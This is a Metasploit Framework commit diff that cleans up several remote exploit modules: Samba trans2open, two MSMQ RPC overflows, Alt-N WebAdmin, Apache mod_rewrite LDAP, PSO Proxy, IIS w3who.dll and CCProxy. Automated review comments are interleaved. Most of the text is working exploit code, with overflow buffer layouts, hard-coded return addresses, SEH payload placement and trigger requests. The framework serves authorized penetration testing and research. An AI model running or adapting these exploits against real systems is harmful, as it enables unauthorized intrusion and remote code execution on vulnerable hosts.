Various module cleanups
git-svn-id: file:///home/svn/framework3/trunk@8498 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
f9ae031055
commit
5d7139ad6f
@ -3,7 +3,7 @@
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -19,13 +19,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::SMB
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Samba trans2open Overflow (Mac OS X)',
|
||||
'Description' => %q{
|
||||
This exploits the buffer overflow found in Samba versions
|
||||
2.2.0 to 2.2.8. This particular module is capable of
|
||||
exploiting the bug on Mac OS X PowerPC systems.
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'Version' => '$Revision$',
|
||||
|
@ -33,8 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
[ 'CVE', '2003-0201'],
|
||||
[ 'OSVDB', '4469'],
|
||||
[ 'BID', '7294'],
|
||||
[ 'URL', 'http://www.digitaldefense.net/labs/advisories/DDI-1013.txt'],
|
||||
[ 'BID', '7294']
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
|
@ -47,14 +46,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Platform' => 'osx',
|
||||
'Arch' => ARCH_PPC,
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
['Stack Brute Force', { 'Rets' => [0xbffffdfc, 0xbfa00000, 512] } ],
|
||||
|
||||
],
|
||||
'DisclosureDate' => 'Apr 7 2003',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(139)
|
||||
|
@ -75,10 +74,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
connect
|
||||
smb_login
|
||||
|
||||
|
||||
# 1988 is required for findrecv shellcode
|
||||
pattern = rand_text_english(1988)
|
||||
|
||||
|
||||
# This stream covers the framepointer and the return address
|
||||
pattern[1195, 64] = [curr_ret].pack('N') * 16
|
||||
|
||||
|
@ -97,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sock.put(trans)
|
||||
handler
|
||||
disconnect
|
||||
|
||||
|
||||
rescue EOFError
|
||||
rescue => e
|
||||
print_status("Caught exception: #{e}")
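Review bot: The new `rescue => e` catches every StandardError where the old line only caught EOFError, so a programming error in the send path is reported as a routine status line instead of surfacing; narrowing it to the connection errors the module expects and logging at error level keeps failures visible, e.g. `rescue ::EOFError, ::Errno::ECONNRESET => e` with `print_error("Caught exception: #{e}")`. `disconnect` also sits inside the begin body, so any exception raised before it leaves the socket open; moving it into an `ensure` clause closes it on both paths. The begin block and the enclosing exploit method start outside the hunk.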
|
||||
|
@ -107,3 +106,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
end
@ -101,12 +101,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
|
||||
# Need to perform target detection
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
|
||||
def brute_exploit(target_addrs)
|
||||
|
||||
if(not @nops)
|
||||
|
@ -221,3 +221,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
end
|
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft Message Queueing Service Path Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in the RPC interface
|
||||
|
@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
hostname, so this must be provided via the 'HNAME' option.
|
||||
Much thanks to snort.org and Jean-Baptiste Marchand's
|
||||
excellent MSRPC website.
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'StackAdjustment' => -3500,
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Windows 2000 ALL / Windows XP SP0-SP1 (English)',
|
||||
|
@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'DisclosureDate' => 'Apr 12 2005',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
|
||||
# Change the default port values to point at MSMQ
|
||||
register_options(
|
||||
[
|
||||
|
@ -74,21 +74,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Common vulnerability scanning tools report port 445/139
|
||||
# due to how they test for the vulnerability. Remap this
|
||||
# back to 2103 for automated exploitation
|
||||
|
||||
|
||||
rport = datastore['RPORT'].to_i
|
||||
if ( rport == 2103 or rport == 2103 )
|
||||
if ( rport == 445 or rport == 139 )
|
||||
datastore['RPORT'] = 2103
|
||||
end
|
||||
|
||||
|
||||
# The NetBIOS hostname is required to exploit this bug reliably.
|
||||
if (not datastore['HNAME'])
|
||||
# XXX automatically determine the hostname
|
||||
return false
|
||||
end
|
||||
|
||||
|
||||
true
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
|
||||
# MSMQ supports three forms of queue names, the two we can use are
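Review bot: The `return false` taken when HNAME is unset gives the user no indication of why the module refused to run; a `print_error("The HNAME option must be set to the target's NetBIOS hostname")` before the return would make the failure actionable. The same silent return exists for DNAME in the `-73,65 +73,65` hunk of the next file. The corrected port remap condition would also read better as `if rport == 445 || rport == 139`, since `or` has lower precedence than assignment and is easy to misread. The enclosing method starts outside the hunk.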
|
||||
|
@ -121,13 +121,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
connect
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
|
||||
handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
|
||||
print_status("Binding to #{handle} ...")
|
||||
dcerpc_bind(handle)
|
||||
print_status("Bound to #{handle} ...")
|
||||
|
||||
stubdata =
|
||||
stubdata =
|
||||
NDR.long(1) +
|
||||
NDR.long(1) +
|
||||
NDR.long(1) +
|
||||
|
@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
NDR.UnicodeConformantVaryingStringPreBuilt(queue_path)
|
||||
|
||||
print_status('Sending exploit ...')
|
||||
|
||||
|
||||
response = dcerpc.call(9, stubdata)
|
||||
|
||||
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
|
||||
|
@ -157,3 +157,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -20,16 +20,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft Message Queueing Service DNS Name Path Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in the RPC interface
|
||||
to the Microsoft Message Queueing service. This exploit requires
|
||||
the target system to have been configured with a DNS name and
|
||||
for that name to be supplied in the 'DNAME' option. This name does
|
||||
not need to be served by a valid DNS server, only configured on
|
||||
not need to be served by a valid DNS server, only configured on
|
||||
the target machine.
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'OSVDB', '39123'],
|
||||
[ 'MSB', 'MS07-065'],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
|
@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'StackAdjustment' => -3500,
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Windows 2000 Server English',
|
||||
|
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'DisclosureDate' => 'Dec 11 2007',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
|
||||
# Change the default port values to point at MSMQ
|
||||
register_options(
|
||||
[
|
||||
|
@ -73,65 +73,65 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Common vulnerability scanning tools report port 445/139
|
||||
# due to how they test for the vulnerability. Remap this
|
||||
# back to 2103 for automated exploitation
|
||||
|
||||
|
||||
rport = datastore['RPORT'].to_i
|
||||
if ( rport == 2103 or rport == 2103 )
|
||||
if ( rport == 445 or rport == 139 )
|
||||
datastore['RPORT'] = 2103
|
||||
end
|
||||
|
||||
|
||||
# The NetBIOS hostname is required to exploit this bug
|
||||
if (not datastore['DNAME'])
|
||||
# XXX automatically determine the hostname
|
||||
return false
|
||||
end
|
||||
|
||||
|
||||
true
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
|
||||
connect
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
|
||||
handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
|
||||
print_status("Binding to #{handle} ...")
|
||||
dcerpc_bind(handle)
|
||||
print_status("Bound to #{handle} ...")
|
||||
|
||||
dname = datastore['DNAME']
|
||||
|
||||
|
||||
boom = rand_text_alphanumeric(4096)
|
||||
|
||||
|
||||
hname,domain = dname.split(".")
|
||||
|
||||
|
||||
if(not domain)
|
||||
print_status("The DNAME parameter specified is not valid.")
|
||||
print_status("This option must be the fully-qualified domain name of the target (as it has been configured).")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
off = 310 - (hname.length * 2)
|
||||
|
||||
|
||||
seh = generate_seh_payload(target.ret)
|
||||
boom[off, seh.length] = seh
|
||||
|
||||
|
||||
buff = Rex::Text.to_unicode("#{dname}\\")
|
||||
buff << boom
|
||||
buff << "\x00\x00"
|
||||
|
||||
|
||||
# Data alignment
|
||||
while(buff.length % 4 != 0)
|
||||
buff << "\x00"
|
||||
end
|
||||
|
||||
stubdata =
|
||||
|
||||
stubdata =
|
||||
NDR.long(1) + # [in] long arg_1,
|
||||
NDR.UnicodeConformantVaryingStringPreBuilt(buff) + # [in][string] wchar_t * arg_2,
|
||||
NDR.long(0) * 5 # ... fields we can ignore
|
||||
|
||||
print_status('Sending exploit...')
|
||||
|
||||
begin
|
||||
begin
|
||||
response = dcerpc.call(6, stubdata)
|
||||
|
||||
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
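Review bot: The comment above the DNAME check still reads `# The NetBIOS hostname is required to exploit this bug`, but the code tests `datastore['DNAME']`, which the description defines as the target's DNS name; it should read `# The fully-qualified DNS name (DNAME) is required to exploit this bug`. Further down, `hname,domain = dname.split(".")` splits on every dot, so for a multi-label name `domain` holds only the second label; it is used only as a presence test, so `dname.split(".", 2)` would state that intent without changing the result. The `!= nil` comparisons on the last line could be written as plain truthiness checks.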
|
||||
|
@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Error: The wrong value has been supplied for the DNAME parameter")
|
||||
print_status("This value must be the fully-qualified domain name of the target")
|
||||
print_status("Many systems have no FQDN configured and cannot be exploited")
|
||||
else
|
||||
else
|
||||
print_status("An unknown response was received from the server:")
|
||||
print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0])
|
||||
end
|
||||
|
@ -148,9 +148,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
|
||||
print_status("No response from the DCERPC service (this is usually a good thing).")
|
||||
end
|
||||
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Alt-N WebAdmin USER Buffer Overflow',
|
||||
'Description' => %q{
|
||||
Alt-N WebAdmin is prone to a buffer overflow condition. This
|
||||
|
@ -51,51 +51,52 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic', {}],
|
||||
['WebAdmin 2.0.4 Universal', { 'Ret' => 0x10074d9b }], # 2.0.4 webAdmin.dll
|
||||
['WebAdmin 2.0.3 Universal', { 'Ret' => 0x10074b13 }], # 2.0.3 webAdmin.dll
|
||||
['WebAdmin 2.0.2 Universal', { 'Ret' => 0x10071e3b }], # 2.0.2 webAdmin.dll
|
||||
['WebAdmin 2.0.1 Universal', { 'Ret' => 0x100543c2 }], # 2.0.1 webAdmin.dll
|
||||
['WebAdmin 2.0.1 Universal', { 'Ret' => 0x100543c2 }], # 2.0.1 webAdmin.dll
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jun 24 2003'))
|
||||
|
||||
|
||||
register_options([Opt::RPORT(1000)], self.class)
|
||||
end
|
||||
|
||||
# Identify the target based on the WebAdmin version number
|
||||
def autofilter
|
||||
res = send_request_raw({
|
||||
'uri' => '/WebAdmin.DLL'
|
||||
}, -1)
|
||||
|
||||
if (res and res.body =~ /WebAdmin.*v(2\..*)$/)
|
||||
case $1
|
||||
when /2\.0\.4/
|
||||
datastore['TARGET'] = 0
|
||||
when /2\.0\.3/
|
||||
datastore['TARGET'] = 1
|
||||
when /2\.0\.2/
|
||||
datastore['TARGET'] = 2
|
||||
when /2\.0\.1/
|
||||
datastore['TARGET'] = 3
|
||||
else
|
||||
return false
|
||||
end
|
||||
|
||||
return true
|
||||
end
|
||||
|
||||
# Not vulnerable
|
||||
return false
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
mytarget = target
|
||||
|
||||
if (target.name =~ /Automatic/)
|
||||
res = send_request_raw({
|
||||
'uri' => '/WebAdmin.DLL'
|
||||
}, -1)
|
||||
|
||||
if (res and res.body =~ /WebAdmin.*v(2\..*)$/)
|
||||
case $1
|
||||
when /2\.0\.4/
|
||||
mytarget = targets[1]
|
||||
when /2\.0\.3/
|
||||
mytarget = targets[2]
|
||||
when /2\.0\.2/
|
||||
mytarget = targets[3]
|
||||
when /2\.0\.1/
|
||||
mytarget = targets[4]
|
||||
else
|
||||
print_error("No target found for v#{$1}")
|
||||
return
|
||||
end
|
||||
else
|
||||
print_error("No target found")
|
||||
end
|
||||
end
|
||||
|
||||
user_cook = rand_text_alphanumeric(2)
|
||||
post_data = 'User=' + make_nops(168) + [target.ret].pack('V') + payload.encoded
|
||||
post_data = 'User=' + make_nops(168) + [mytarget.ret].pack('V') + payload.encoded
|
||||
post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'
|
||||
|
||||
|
||||
print_status("Sending request...")
|
||||
res = send_request_cgi({
|
||||
'uri' => '/WebAdmin.DLL',
|
||||
|
@ -104,15 +105,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'content-type' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => "User=#{user_cook}; Lang=en; Theme=standard",
|
||||
'data' => post_data,
|
||||
'headers' =>
|
||||
'headers' =>
|
||||
{
|
||||
'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png',
|
||||
'Accept-Language' => 'en',
|
||||
'Accept-Charset' => 'iso-8859-1,*,utf-8'
|
||||
}
|
||||
}, 5)
|
||||
|
||||
|
||||
handler
|
||||
end
|
||||
|
||||
end
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Apache module mod_rewrite LDAP protocol Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits the mod_rewrite LDAP protocol scheme handling
|
||||
|
@ -26,8 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.
|
||||
This module requires REWRITEPATH to be set accurately. In addition,
|
||||
the target must have 'RewriteEngine on' configured, with a specific
|
||||
'RewriteRule' condition enabled to allow for exploitation.
|
||||
|
||||
'RewriteRule' condition enabled to allow for exploitation.
|
||||
|
||||
The flaw affects multiple platforms, however this module currently
|
||||
only supports Windows based installations.
|
||||
},
|
||||
|
@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'StackAdjustment' => -3500,
|
||||
'DisableNops' => 'True',
|
||||
},
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ], # patrickw tested OK 20090310 win32
|
||||
],
|
||||
|
@ -69,16 +69,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
OptString.new('REWRITEPATH', [true, "The mod_rewrite URI path", "rewrite_path"]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def autofilter
|
||||
return false
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
res = send_request_raw({
|
||||
'uri' => '/',
|
||||
'version' => '1.1',
|
||||
}, 2)
|
||||
'uri' => '/',
|
||||
'version' => '1.1',
|
||||
}, 2)
|
||||
|
||||
if (res.to_s =~ /Apache/) # This could be smarter.
|
||||
return Exploit::CheckCode::Detected
|
||||
|
@ -88,10 +85,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
|
||||
|
||||
# On Linux Apache, it is possible to overwrite EIP by
|
||||
# sending ldap://<buf> ... TODO patrickw
|
||||
|
||||
|
||||
trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90'
|
||||
|
||||
print_status("Sending payload.")
|
||||
|
@ -102,3 +99,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
handler
|
||||
end
|
||||
end
@ -70,10 +70,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
end
|
||||
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
def check
|
||||
connect
|
||||
|
||||
|
@ -120,4 +116,5 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def wfs_delay
|
||||
25
|
||||
end
|
||||
end
|
||||
end
@ -54,8 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'Windows XP Pro SP2 English', { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Feb 20 2004',
|
||||
'DefaultTarget' => 0))
|
||||
'DisclosureDate' => 'Feb 20 2004'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
|
@ -63,29 +63,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
end
|
||||
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
def check
|
||||
connect
|
||||
sock.put("GET / HTTP/1.0\r\n\r\n")
|
||||
banner = sock.get(-1,3)
|
||||
if (banner =~ /PSO Proxy 0\.9/)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
exploit = rand_text_alphanumeric(1024, payload_badchars)
|
||||
exploit += [target['Ret']].pack('V') + payload.encoded
|
||||
|
||||
sock.put(exploit + "\r\n\r\n")
|
||||
|
||||
disconnect
|
||||
handler
|
||||
def check
|
||||
connect
|
||||
sock.put("GET / HTTP/1.0\r\n\r\n")
|
||||
banner = sock.get(-1,3)
|
||||
if (banner =~ /PSO Proxy 0\.9/)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
exploit = rand_text_alphanumeric(1024, payload_badchars)
|
||||
exploit += [target['Ret']].pack('V') + payload.encoded
|
||||
|
||||
sock.put(exploit + "\r\n\r\n")
|
||||
|
||||
disconnect
|
||||
handler
|
||||
end
|
||||
end
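Review bot: The re-indented `check` calls `connect` and reads the banner but never calls `disconnect`, unlike `exploit` below it and unlike the CCProxy `check` in this same commit, which disconnects right after `sock.get_once`; add `disconnect` after `banner = sock.get(-1,3)`. A banner match only shows the product is present, so `return Exploit::CheckCode::Appears` would be the consistent result here, as the CCProxy module uses, rather than `Vulnerable`.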
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft IIS ISAPI w3who.dll Query String Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in the w3who.dll ISAPI
|
||||
|
@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Windows 2000 and Windows XP (SP2). When exploiting Windows
|
||||
XP, the payload must call RevertToSelf before it will be
|
||||
able to spawn a command shell.
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -55,61 +55,61 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic Detection', { }],
|
||||
['Windows 2000 RESKIT DLL [Windows 2000]', { 'Rets' => [ 48, 0x01169f4a ] }], # pop, pop, ret magic
|
||||
['Windows 2000 RESKIT DLL [Windows XP]', { 'Rets' => [ 748, 0x10019f4a ] }], # pop, pop, ret magic
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Dec 6 2004'))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URL', [ true, "The path to w3who.dll", "/scripts/w3who.dll" ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
# Identify the target based on the IIS version
|
||||
def autofilter
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URL']
|
||||
}, -1)
|
||||
|
||||
# Was a vulnerable system detected?
|
||||
if (res and res.body =~ /Access Token/)
|
||||
case res.headers['Server']
|
||||
when /5\.1/
|
||||
datastore['TARGET'] = 1
|
||||
else
|
||||
datastore['TARGET'] = 0
|
||||
end
|
||||
|
||||
return true
|
||||
end
|
||||
|
||||
# Not vulnerable
|
||||
return false
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URL']
|
||||
}, -1)
|
||||
|
||||
|
||||
if (res and res.body =~ /Access Token/)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
mytarget = target
|
||||
|
||||
if(mytarget.name =~ /Automatic/)
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URL']
|
||||
}, -1)
|
||||
|
||||
# Was a vulnerable system detected?
|
||||
if (res and res.body =~ /Access Token/)
|
||||
case res.headers['Server']
|
||||
when /5\.1/
|
||||
mytarget = targets[2]
|
||||
else
|
||||
mytarget = targets[1]
|
||||
end
|
||||
else
|
||||
print_error("No valid target found")
|
||||
end
|
||||
end
|
||||
|
||||
buf = rand_text_english(8192, payload_badchars)
|
||||
buf[target['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
|
||||
buf[target['Rets'][0] - 0, 4] = [ target['Rets'][1] ].pack('V')
|
||||
buf[target['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
|
||||
buf[target['Rets'][0] - 4 - payload.encoded.length, payload.encoded.length] = payload.encoded
|
||||
|
||||
buf[mytarget['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
|
||||
buf[mytarget['Rets'][0] - 0, 4] = [ mytarget['Rets'][1] ].pack('V')
|
||||
buf[mytarget['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
|
||||
buf[mytarget['Rets'][0] - 4 - payload.encoded.length, payload.encoded.length] = payload.encoded
|
||||
|
||||
print_status("Sending request...")
|
||||
r = send_request_raw({
|
||||
'uri' => datastore['URL'],
|
||||
|
@ -120,3 +120,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
@ -3,10 +3,10 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
@ -14,11 +14,11 @@ require 'msf/core'
|
|||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = AverageRanking
|
||||
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'CCProxy <= v6.2 Telnet Proxy Ping Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits the YoungZSoft CCProxy <= v6.2 suite
|
||||
|
@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
long address to the 'ping' command.
|
||||
},
|
||||
'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ],
|
||||
'Arch' => [ ARCH_X86 ],
|
||||
'Arch' => [ ARCH_X86 ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
|
@ -35,14 +35,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'OSVDB', '11593' ],
|
||||
[ 'BID', '11666 ' ],
|
||||
[ 'URL', 'http://milw0rm.com/exploits/621' ],
|
||||
],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
{
|
||||
'Space' => 1012,
|
||||
'BadChars' => "\x00\x07\x08\x0a\x0d\x20",
|
||||
},
|
||||
|
@ -57,31 +57,27 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll
|
||||
],
|
||||
'DisclosureDate' => 'Nov 11 2004'))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(23),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
def check
|
||||
def check
|
||||
connect
|
||||
banner = sock.get_once(-1,3)
|
||||
disconnect
|
||||
|
||||
if (banner =~ /CCProxy Telnet Service Ready/)
|
||||
return Exploit::CheckCode::Appears
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
|
||||
sploit = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
|
||||
sock.put(sploit + "\r\n")
|
||||
|
||||
|
@ -90,3 +86,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
